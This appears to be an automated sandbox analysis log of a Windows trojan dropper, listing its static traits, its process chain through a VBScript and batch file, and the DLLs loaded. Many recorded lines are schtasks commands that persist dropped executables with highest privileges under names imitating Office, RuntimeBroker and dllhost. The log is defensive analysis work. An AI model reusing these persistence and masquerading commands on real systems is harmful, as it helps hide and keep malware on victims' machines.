            Source: UAhpvIJrmb.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: DFpUKTL6kg.exe, 00000000.00000003.1651244465.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1651244465.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1648113959.000000000681F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1648627478.0000000007120000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1649144803.000000000712B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000002.1652162323.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000002.1652162323.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GxpHieXh78ehHiIiPXV.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GxpHieXh78ehHiIiPXV.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GxpHieXh78ehHiIiPXV.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GxpHieXh78ehHiIiPXV.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, acvMHVZVlLFT3hCKiXu.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, acvMHVZVlLFT3hCKiXu.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, acvMHVZVlLFT3hCKiXu.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, acvMHVZVlLFT3hCKiXu.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@36/23@1/1
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Code function: 0_2_009F6EC9 GetLastError,FormatMessageW,0_2_009F6EC9
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A09E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A09E1C
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files (x86)\windows nt\UAhpvIJrmb.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\browsersvc.exe.logJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMutant created: NULL
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\411b4a688f55af8d6c8739be8cea8bf742f7dd61
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: sfxname0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: sfxstime0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: STARTDLG0_2_00A0D5D4
            Source: DFpUKTL6kg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DFpUKTL6kg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: DFpUKTL6kg.exe | ReversingLabs: Detection: 73%
            Source: DFpUKTL6kg.exe | Virustotal: Detection: 59%
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | File read: C:\Users\user\Desktop\DFpUKTL6kg.exe
            Source: unknown | Process created: C:\Users\user\Desktop\DFpUKTL6kg.exe "C:\Users\user\Desktop\DFpUKTL6kg.exe"
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe "C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe"
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"
            Source: C:\chainSurrogate\browsersvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: mscoree.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: apphelp.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: kernel.appcore.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: version.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: uxtheme.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: windows.storage.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: wldp.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: profapi.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: cryptsp.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: rsaenh.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: cryptbase.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: sspicli.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: ntmarta.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: wbemcomn.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: amsi.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: userenv.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: propsys.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: edputil.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: urlmon.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: iertutil.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: srvcli.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: netutils.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: wintypes.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: appresolver.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: bcp47langs.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: slc.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: sppc.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\chainSurrogate\browsersvc.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: winnsi.dll
